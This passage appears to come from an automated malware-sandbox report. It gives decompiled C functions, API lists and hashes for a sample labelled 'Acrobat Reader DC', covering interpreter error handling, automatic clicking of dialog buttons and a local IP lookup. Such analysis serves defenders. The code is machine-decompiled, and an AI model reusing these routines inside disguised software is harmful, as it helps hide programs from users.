                                  						_t101 =  &_v52;
                                  						E0040BC70( &_v52, _t140);
                                  						_t121 = _a12;
                                  						if(_a12 >= 0) {
                                  							E0040C600(E00402160( &_v52, _t131, _t111, _t121) | 0xffffffff,  &_v52, _t121);
                                  							E0040D200( &_v52,  &_v52, L"^ ERROR", _t146);
                                  							E0040BD50( &_v24, _t146,  &_v52);
                                  							E0040D200( &_v24,  &_v52, "\n", _t146);
                                  							_t96 = _v32;
                                  						}
                                  						E0040D200( &_v24, _t101, L"\nError: ", _t146);
                                  						E0040BD50( &_v24, _t146,  &_v68);
                                  						if( *0x4974e8 == 0) {
                                  							MessageBoxW( *0x497518, _v24, _v84, 0x11010);
                                  							goto L14;
                                  						} else {
                                  							_t144 = _t96;
                                  							if(_t96 == 0) {
                                  								_t132 = _a4;
                                  								_push(_v68);
                                  								_push( *((intOrPtr*)(_t132 + 0xf4)));
                                  								_push( *((intOrPtr*)(_t132 + 0xc8)));
                                  								_push(L"%s (%d) : ==> %s:\n");
                                  								E00413ABE(_t96, _v68, L"\nError: ", _t132, __eflags);
                                  								L15:
                                  								 *((intOrPtr*)(_t132 + 0xf8)) = 1;
                                  								if( *((char*)(_t132 + 0x118)) == 0) {
                                  									 *0x4974f4 = 1;
                                  								} else {
                                  									 *0x4974f4 = _a8 + 0x7ffff000;
                                  								}
                                  								E00402250( &_v52);
                                  								E00402250( &_v24);
                                  								E00402250( &_v68);
                                  								return E00402250( &_v84);
                                  							}
                                  							_push(_v52);
                                  							_push(_t131);
                                  							_push(_v68);
                                  							_push(_v28);
                                  							_push(_t96);
                                  							_push(L"%s (%d) : ==> %s:\n%s\n%s\n");
                                  							E00413ABE(_t96, _v52, L"\nError: ", _t131, _t144);
                                  							L14:
                                  							_t132 = _a4;
                                  							goto L15;
                                  						}
                                  					}
                                  				}
                                  				return _t51;
                                  			}

























                                  APIs
                                  • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                  • __swprintf.LIBCMT ref: 0045E7F7
                                  • _wprintf.LIBCMT ref: 0045E8B3
                                  • _wprintf.LIBCMT ref: 0045E8D7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                  • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                  • API String ID: 2295938435-2354261254
                                  • Opcode ID: 44e01960a33580a095bbf2e3e13559187395cafc70d58b6b713acd2f3f366ced
                                  • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                  • Opcode Fuzzy Hash: 44e01960a33580a095bbf2e3e13559187395cafc70d58b6b713acd2f3f366ced
                                  • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E004531B1(intOrPtr* _a4) {
                                  				char _v20;
                                  				char _v152;
                                  				intOrPtr _t30;
                                  				signed int _t31;
                                  				intOrPtr* _t38;
                                  
                                  				_t38 = _a4;
                                  				_t30 =  *((intOrPtr*)(_t38 + 8));
                                  				if(_t30 == 4) {
                                  					return _t30;
                                  				} else {
                                  					_t31 = _t30 - 1;
                                  					if(_t31 > 0xa) {
                                  						L17:
                                  						_v152 = 0;
                                  						goto L18;
                                  					} else {
                                  						switch( *((intOrPtr*)(_t31 * 4 +  &M00453385))) {
                                  							case 0:
                                  								E0041305C( *_t38,  &_v152, 0xa);
                                  								_t50 = _t50 + 0xc;
                                  								goto L18;
                                  							case 1:
                                  								__eax =  *(__ebx + 4);
                                  								__ecx =  *__ebx;
                                  								_t7 =  &_v152; // -148
                                  								__edx = _t7;
                                  								__eax = E00413109( *__ebx,  *(__ebx + 4), _t7, 0xa);
                                  								goto L18;
                                  							case 2:
                                  								__esp = __esp - 8;
                                  								 *__esp =  *__ebx;
                                  								_t8 =  &_v152; // -148
                                  								__edx = _t8;
                                  								_push(L"%.15g");
                                  								_push(__edx);
                                  								__eax = E0041329B(__edx);
                                  								__esp = __esp + 0x10;
                                  								goto L18;
                                  							case 3:
                                  								goto L17;
                                  							case 4:
                                  								__eax =  *__ebx;
                                  								_t9 =  &_v152; // -148
                                  								__ecx = _t9;
                                  								__eax = E0041329B(__edx, _t9, L"0x%p",  *__ebx);
                                  								goto L18;
                                  							case 5:
                                  								__eflags =  *__ebx;
                                  								if( *__ebx == 0) {
                                  									_t11 =  &_v152; // -148
                                  									_t11 = E00411567(_t11, L"False");
                                  								} else {
                                  									_t10 =  &_v152; // -148
                                  									__edx = _t10;
                                  									__eax = E00411567(_t10, L"True");
                                  								}
                                  								goto L18;
                                  							case 6:
                                  								__edx =  *__ebx;
                                  								_t12 =  &_v20; // -16
                                  								__ecx = _t12;
                                  								E0044B3F6( *__ebx, _t12) =  *__eax;
                                  								_t13 =  &_v152; // -148
                                  								__ecx = _t13;
                                  								__eax = E00411567(_t13, __eax);
                                  								_t14 =  &_v20; // -16
                                  								__ecx = _t14;
                                  								__eax = E00402250(_t14);
                                  								L18:
                                  								E00403D80(_t38);
                                  								_push(0x10);
                                  								_t33 = E004115D7(_t41, _t38, _t53);
                                  								_t54 = _t33;
                                  								if(_t33 == 0) {
                                  									__eflags = 0;
                                  									 *((intOrPtr*)(_t38 + 0xc)) = 0;
                                  									return 0;
                                  								}
                                  								_t35 = E00401B10( &_v152, _t33, _t54);
                                  								 *((intOrPtr*)(_t38 + 0xc)) = _t35;
                                  								return _t35;
                                  								goto L22;
                                  							case 7:
                                  								__edx =  *__ebx;
                                  								__esi =  *( *__ebx);
                                  								__ecx = 0;
                                  								__eax = 6 + __esi * 4;
                                  								2 = __eax * 2 >> 0x20;
                                  								__eax = __eax * 2;
                                  								0 | __eflags > 0x00000000 =  ~(__eflags > 0);
                                  								__ecx =  ~(__eflags > 0) | __eax;
                                  								_push( ~(__eflags > 0) | __eax);
                                  								__edi = E004115D7(__edi, __esi, __eflags);
                                  								__eax =  *__ebx;
                                  								__esp = __esp + 4;
                                  								__eflags =  *__eax;
                                  								if( *__eax == 0) {
                                  									__eax = 0;
                                  									__eflags = 0;
                                  									 *__edi = __ax;
                                  								} else {
                                  									__ecx =  *__eax;
                                  									__edx =  *(__eax + 4);
                                  									__eax = E00432DFC( *(__eax + 4), __edi,  *__eax);
                                  								}
                                  								__esi = __ebx;
                                  								__eax = E00403D80(__esi);
                                  								_push(0x10);
                                  								__eax = E004115D7(__edi, __esi, __eflags);
                                  								__esp = __esp + 4;
                                  								__eflags = __eax;
                                  								if(__eflags == 0) {
                                  									__eax = 0;
                                  									__eflags = 0;
                                  									_push(__edi);
                                  									 *(__ebx + 0xc) = 0;
                                  									__eax = E004111DC();
                                  									__esp = __esp + 4;
                                  									_pop(__edi);
                                  									_pop(__esi);
                                  									return __eax;
                                  								} else {
                                  									__esi = __eax;
                                  									__eax = E00401B10(__edi, __eax, __eflags);
                                  									_push(__edi);
                                  									 *(__ebx + 0xc) = __eax;
                                  									__eax = E004111DC();
                                  									__esp = __esp + 4;
                                  									_pop(__edi);
                                  									_pop(__esi);
                                  									return __eax;
                                  								}
                                  								goto L22;
                                  						}
                                  					}
                                  				}
                                  				L22:
                                  			}









                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __swprintf_wcscpy$__i64tow__itow
                                  • String ID: %.15g$0x%p$False$True
                                  • API String ID: 3038501623-2263619337
                                  • Opcode ID: 9e50b87208696871976aec561e59ab744ba77687bdac14840efb02e890edfc0f
                                  • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                  • Opcode Fuzzy Hash: 9e50b87208696871976aec561e59ab744ba77687bdac14840efb02e890edfc0f
                                  • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E0045E538(void* __fp0, struct HINSTANCE__* _a4, intOrPtr _a8) {
                                  				intOrPtr _v8;
                                  				WCHAR* _v24;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				char _v48;
                                  				char _v64;
                                  				WCHAR* _v80;
                                  				short _v8276;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				struct HINSTANCE__* _t48;
                                  				WCHAR* _t57;
                                  				intOrPtr _t92;
                                  				WCHAR* _t110;
                                  				intOrPtr _t111;
                                  				intOrPtr _t120;
                                  				intOrPtr _t122;
                                  				struct HINSTANCE__* _t123;
                                  				void* _t136;
                                  
                                  				_t136 = __fp0;
                                  				_t48 = E00422240(0x2054);
                                  				if( *0x4974e2 == 0) {
                                  					_t48 = _a4;
                                  					_t129 =  *((intOrPtr*)(_t48 + 0xf8)) - 1;
                                  					if( *((intOrPtr*)(_t48 + 0xf8)) != 1) {
                                  						LoadStringW( *0x497520, 0x66,  &_v8276, 0xfff);
                                  						_t110 =  &_v8276;
                                  						E00401B10(_t110,  &_v80, _t129);
                                  						_t95 =  *0x497520;
                                  						LoadStringW( *0x497520, 0x72, _t110, 0xfff);
                                  						E00401B10(_t110,  &_v64, _t129);
                                  						_t105 = _a4;
                                  						_t120 =  *((intOrPtr*)(_a4 + 0xf4));
                                  						_v8 = E004348DE(_t120);
                                  						_t111 = E004348AA(_t120);
                                  						_v28 = _t111;
                                  						_t92 = E00434908(E0043492F(_t120));
                                  						_v32 = _t92;
                                  						_t57 =  &_v8276;
                                  						_t130 = _t92;
                                  						if(_t92 == 0) {
                                  							_t95 = _a4;
                                  							_t105 =  *((intOrPtr*)(_t95 + 0xc8));
                                  							_push( *((intOrPtr*)(_t95 + 0xc8)));
                                  							_push(_t120);
                                  						} else {
                                  							_push(_t92);
                                  							_push(_t111);
                                  						}
                                  						_push(L"Line %d  (File \"%s\"):\n\n");
                                  						_push(_t57);
                                  						E0041329B(_t105);
                                  						E00401B10( &_v8276,  &_v24, _t130);
                                  						_t122 = _v8;
                                  						_t131 = _t122;
                                  						if(_t122 != 0) {
                                  							E0040D200( &_v24, _t95, _t122, _t136);
                                  							E0040D200( &_v24, _t95, "\n", _t136);
                                  						}
                                  						_t96 =  &_v48;
                                  						E0040BC70( &_v48, _t131);
                                  						_t113 = _a8;
                                  						if(_a8 != 0) {
                                  							E00402160( &_v48, L"^ ERROR ", _t105, _t113);
                                  							E0040D200( &_v48,  &_v48, _t113, _t136);
                                  							_t96 =  &_v48;
                                  							E0040BD50( &_v24, _t136,  &_v48);
                                  							E0040D200( &_v24,  &_v48, "\n", _t136);
                                  							_t92 = _v32;
                                  						}
                                  						E0040D200( &_v24, _t96, L"\nError: ", _t136);
                                  						E0040BD50( &_v24, _t136,  &_v64);
                                  						if( *0x4974e8 == 0) {
                                  							MessageBoxW( *0x497518, _v24, _v80, 0x11010);
                                  							goto L14;
                                  						} else {
                                  							_t134 = _t92;
                                  							if(_t92 == 0) {
                                  								_t123 = _a4;
                                  								_push(_v64);
                                  								_push( *((intOrPtr*)(_t123 + 0xf4)));
                                  								_push( *((intOrPtr*)(_t123 + 0xc8)));
                                  								_push(L"%s (%d) : ==> %s:\n");
                                  								E00413ABE(_t92,  *((intOrPtr*)(_t123 + 0xc8)), L"\nError: ", _t123, __eflags);
                                  								L15:
                                  								asm("sbb eax, eax");
                                  								 *((intOrPtr*)(_t123 + 0xf8)) = 1;
                                  								 *0x4974f4 = ( ~( *(_t123 + 0x118) & 0x000000ff) & 0x7ffff071) + 1;
                                  								E00402250( &_v48);
                                  								E00402250( &_v24);
                                  								E00402250( &_v64);
                                  								return E00402250( &_v80);
                                  							}
                                  							_push(_v48);
                                  							_push(_t122);
                                  							_push(_v64);
                                  							_push(_v28);
                                  							_push(_t92);
                                  							_push(L"%s (%d) : ==> %s:\n%s\n%s\n");
                                  							E00413ABE(_t92, _v28, L"\nError: ", _t122, _t134);
                                  							L14:
                                  							_t123 = _a4;
                                  							goto L15;
                                  						}
                                  					}
                                  				}
                                  				return _t48;
                                  			}

























                                  APIs
                                  • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                  • __swprintf.LIBCMT ref: 0045E5F6
                                  • _wprintf.LIBCMT ref: 0045E6A3
                                  • _wprintf.LIBCMT ref: 0045E6C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                  • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                  • API String ID: 2295938435-8599901
                                  • Opcode ID: 97ebc5a5c228c2a30bddf96a7da616a93a1f5c8b5e746e323a0bc296dbc3a2d1
                                  • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                  • Opcode Fuzzy Hash: 97ebc5a5c228c2a30bddf96a7da616a93a1f5c8b5e746e323a0bc296dbc3a2d1
                                  • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00443B61(void* __edx, long* _a4) {
                                  				void* __esi;
                                  				void* _t5;
                                  				struct HWND__* _t8;
                                  				struct HWND__* _t9;
                                  				struct HWND__* _t12;
                                  				struct HWND__* _t18;
                                  				long* _t22;
                                  				struct HWND__* _t24;
                                  				void* _t25;
                                  				struct HWND__* _t26;
                                  				struct HWND__* _t27;
                                  				long _t28;
                                  				long _t29;
                                  				struct HWND__* _t30;
                                  				void* _t35;
                                  
                                  				_t25 = __edx;
                                  				_t29 = timeGetTime();
                                  				if( *0x4974ef == 0) {
                                  					L12:
                                  					return 0;
                                  				} else {
                                  					_t22 = _a4;
                                  					while(1) {
                                  						_t5 = E0040C620(_t29);
                                  						_t28 = _t22[1];
                                  						_t35 = _t25;
                                  						if(_t35 > 0 || _t35 >= 0 && _t5 >= _t28) {
                                  							break;
                                  						}
                                  						Sleep(0xa);
                                  						if( *0x4974ef != 0) {
                                  							continue;
                                  						} else {
                                  							return 0;
                                  						}
                                  						goto L13;
                                  					}
                                  					 *0x4a7538 = 0;
                                  					EnumThreadWindows( *_t22, E00433D09, 0);
                                  					_t8 =  *0x4a7538; // 0x0
                                  					if(_t8 != 0) {
                                  						 *0x4974ee = 1;
                                  						_t9 = FindWindowExW(_t8, 0, L"BUTTON", 0);
                                  						_t24 =  *0x4a7538; // 0x0
                                  						_t30 = _t9;
                                  						if(_t30 == 0) {
                                  							SendMessageW(_t24, 0x10, 0, 0);
                                  							Sleep(0xfa);
                                  							_t26 =  *0x4a7538; // 0x0
                                  							if(IsWindow(_t26) == 0) {
                                  								goto L12;
                                  							} else {
                                  								_t12 =  *0x4a7538; // 0x0
                                  								EndDialog(_t12, 0);
                                  								return 0;
                                  							}
                                  						} else {
                                  							E004439C1(_t24, 1);
                                  							_t27 =  *0x4a7538; // 0x0
                                  							SetActiveWindow(_t27);
                                  							SendMessageW(_t30, 0xf5, 0, 0);
                                  							_t18 =  *0x4a7538; // 0x0
                                  							E004439C1(_t18, 0);
                                  							return 0;
                                  						}
                                  					} else {
                                  						goto L12;
                                  					}
                                  				}
                                  				L13:
                                  			}



















                                  APIs
                                  • timeGetTime.WINMM ref: 00443B67
                                    • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                  • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                                  • SetActiveWindow.USER32(00000000), ref: 00443BEC
                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                  • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                                  • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                  • IsWindow.USER32(00000000), ref: 00443C3A
                                  • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                                    • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                    • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                    • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                  • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                  • String ID: BUTTON
                                  • API String ID: 1834419854-3405671355
                                  • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                  • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                  • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                  • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 74%
                                  			E00454014(void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                  				WCHAR* _v24;
                                  				WCHAR* _v40;
                                  				short _v8232;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				intOrPtr _t29;
                                  				intOrPtr _t49;
                                  				void* _t56;
                                  				void* _t73;
                                  				void* _t75;
                                  
                                  				_t75 = __fp0;
                                  				_t73 = __eflags;
                                  				E00422240(0x2028);
                                  				_t49 = _a4;
                                  				_t50 =  *(_t49 + 0x48);
                                  				LoadStringW(GetModuleHandleW(0),  *(_t49 + 0x48),  &_v8232, 0xfff);
                                  				_t67 =  &_v40;
                                  				E00401B10( &_v8232,  &_v40, _t73);
                                  				_t74 =  *((char*)(_t49 + 3));
                                  				if( *((char*)(_t49 + 3)) == 0) {
                                  					_t29 = _a8;
                                  					__eflags = _t29;
                                  					if(_t29 != 0) {
                                  						_push(_t29);
                                  						E0041329B(_a12,  &_v8232, L"Line %d  (File \"%s\"):\n\n", _a12);
                                  					} else {
                                  						_t50 =  &_v8232;
                                  						E0041329B(_t56,  &_v8232, L"Line %d:\n\n", _a12);
                                  					}
                                  					_t68 =  &_v24;
                                  					E00401B10( &_v8232,  &_v24, __eflags);
                                  					E0040D200( &_v24, _t50, _a20, _t75);
                                  					E0040D200(_t68, _t50, L"\n\nError: ", _t75);
                                  					E0040D200(_t68, _t50, _a16, _t75);
                                  					E0040D200(_t68, _t50, L".\n\n", _t75);
                                  					MessageBoxW(0, _v24, _v40, 0x11010);
                                  					E00402250(_t68);
                                  					return E00402250( &_v40);
                                  				} else {
                                  					_push(0x484ea8);
                                  					_push(_a20);
                                  					_push(_a16);
                                  					_push(_a12);
                                  					_push(_a8);
                                  					_push(L"%s (%d) : ==> %s.: \n%s \n%s\n");
                                  					E00413ABE(_t49, _a8,  &_v8232,  &_v40, _t74);
                                  					return E00402250(_t67);
                                  				}
                                  			}
















                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                  • LoadStringW.USER32(00000000), ref: 00454040
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • _wprintf.LIBCMT ref: 00454074
                                  • __swprintf.LIBCMT ref: 004540A3
                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                  • API String ID: 455036304-4153970271
                                  • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                  • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                  • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                  • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 44%
                                  			E00433493(signed int _a4, intOrPtr _a8) {
                                  				char _v8;
                                  				char _v268;
                                  				char _v668;
                                  				char* _t14;
                                  				int _t16;
                                  				intOrPtr* _t17;
                                  				void* _t19;
                                  				void* _t24;
                                  				void* _t25;
                                  				intOrPtr* _t29;
                                  				void* _t31;
                                  				intOrPtr _t33;
                                  				signed int _t34;
                                  				void* _t35;
                                  
                                  				_t34 = _a4;
                                  				_t33 = _a8;
                                  				_t14 =  &_v668;
                                  				__imp__#115(0x101, _t14);
                                  				if(_t14 != 0) {
                                  					L8:
                                  					return E00411567(_t33, 0x484ea8);
                                  				} else {
                                  					_t16 = gethostname( &_v268, 0x100);
                                  					__imp__#52( &_v268);
                                  					if(_t16 == 0) {
                                  						goto L8;
                                  					} else {
                                  						_t17 =  *((intOrPtr*)(_t16 + 0xc));
                                  						_t31 = 0;
                                  						if( *_t17 != 0) {
                                  							_t29 = _t17;
                                  							do {
                                  								_t29 = _t29 + 4;
                                  								_t31 = _t31 + 1;
                                  							} while ( *_t29 != 0);
                                  						}
                                  						if(_t34 <= _t31) {
                                  							_t19 = E00410E60( &_v8,  *((intOrPtr*)(_t17 + _t34 * 4 - 4)), 4);
                                  							__imp__#11(_v8);
                                  							E00413650( &_v268, _t19);
                                  							_t35 = E0043299A( &_v268, 0xffffffff);
                                  							E00411567(_t33, _t35);
                                  							_t24 = E004111DC();
                                  							__imp__#116(_t35);
                                  							return _t24;
                                  						} else {
                                  							_t25 = E00411567(_t33, L"0.0.0.0");
                                  							__imp__#116();
                                  							return _t25;
                                  						}
                                  					}
                                  				}
                                  			}


















                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcscpy$Cleanup$Startup_memmovegethostbynamegethostnameinet_ntoa
                                  • String ID: 0.0.0.0
                                  • API String ID: 3306283345-3771769585
                                  • Opcode ID: 12bd0bd87adc01a11e762e32582fe9f9ee670ff773acf44d869f4b862077f2e3
                                  • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                  • Opcode Fuzzy Hash: 12bd0bd87adc01a11e762e32582fe9f9ee670ff773acf44d869f4b862077f2e3
                                  • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 29%
                                  			E00467C8E(intOrPtr* _a4, signed short* _a8) {
                                  				char _v8;
                                  				signed short* _v12;
                                  				char _v16;
                                  				char _v20;
                                  				char _v24;
                                  				char _v36;
                                  				signed short _v44;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed int _t100;
                                  				intOrPtr _t105;
                                  				signed int _t109;
                                  				signed int _t110;
                                  				signed int _t113;
                                  				void* _t120;
                                  				signed int _t135;
                                  				signed int _t139;
                                  				signed int _t146;
                                  				signed short* _t154;
                                  				void* _t155;
                                  				signed int _t157;
